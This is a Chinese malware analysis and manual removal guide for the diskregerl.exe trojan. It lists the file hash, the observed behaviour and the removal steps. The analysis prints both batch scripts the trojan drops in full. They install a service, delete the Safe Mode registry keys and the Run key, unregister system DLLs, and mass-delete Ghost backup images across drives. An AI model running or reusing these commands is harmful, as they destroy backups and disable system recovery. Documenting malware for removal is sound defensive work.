diskregerl.exe(Trojan.Agent.cdt)病毒手动查杀

    文件MD5:e98a4571cf72b798077d12d6c4894629
    行为分析:
    1、拷贝文件:
    C:\windows\system32\diskregerl.exe  45,056 字节
    2、无添加启动项举动。
    3、释放2个批处理:
    内容分别为:
    22483
    17213
    25187
    6133
    22690
    25373
    date 2004-08-17
    19477
    time 20:00:00
    ping 127.0.0.1 -n 5
    sc.exe create diskregerl BinPath= “C:\windows\system32\diskregerl.exe -kills” type= own type= interact start= auto DisplayName= diskregerl Programnot
    sc.exe description diskregerl 创建网络连接2
    regsvr32.exe /u /s scrrun.dll
    regsvr32.exe /u /s shimgvw.dll
    regsvr32.exe /u /s itss.dll
    regsvr32.exe /u /s vbscript.dll
    regsvr32.exe /s jscript.dll
    reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
    reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
    reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
    reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
    reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
    23413
    sc.exe start diskregerl
    del “C:\WINDOWS\Media\Windows XP 开始.wav”
    del “C:\WINDOWS\Media\Windows XP 信息栏.wav”
    del “C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav”
    regsvr32.exe /s C:\windows\system32\Programnot.dll
    ping 127.0.0.1 -n 6
    del “C:\Documents and Settings\孤独更可靠\桌面\oky.exe” /F
    22483
    17213
    date 2008-04-02
    time 08:21:33
    del %0
    exit
    第二个:
    25187
    6133
    226902537319477
    2819720092
    404
    ping 127.0.0.1 -n 16
    13539
    cmd.exe /c del /f /s /q c:*.gho
    6752
    cmd.exe /c del /f /s /q d:*.gho
    31772
    cmd.exe /c del /f /s /q e:*.gho
    12028
    cmd.exe /c del /f /s /q f:*.gho
    8720
    cmd.exe /c del /f /s /q g:*.gho
    10731
    cmd.exe /c del /f /s /q h:*.gho
    8840
    cmd.exe /c del /f /s /q i:*.gho
    11736
    regsvr32.exe /s C:\windows\system32\Programnot.dll
    del %0
    exit
    4、连接网站,刷流量:
    http://www.xerty.cn/^^/300center.htm
    5、另外该病毒可能恶意锁定IE主页,不过未实现。
    解决方法:
    1、重启计算机。
    2、删除文件:
    C:\windows\system32\diskregerl.exe
    3、如果重启后病毒无法删除,请下载冰刃(该软件可到down.45it.com下载),结束其进程。
    按此在新窗口打开图片

发表评论

发表评论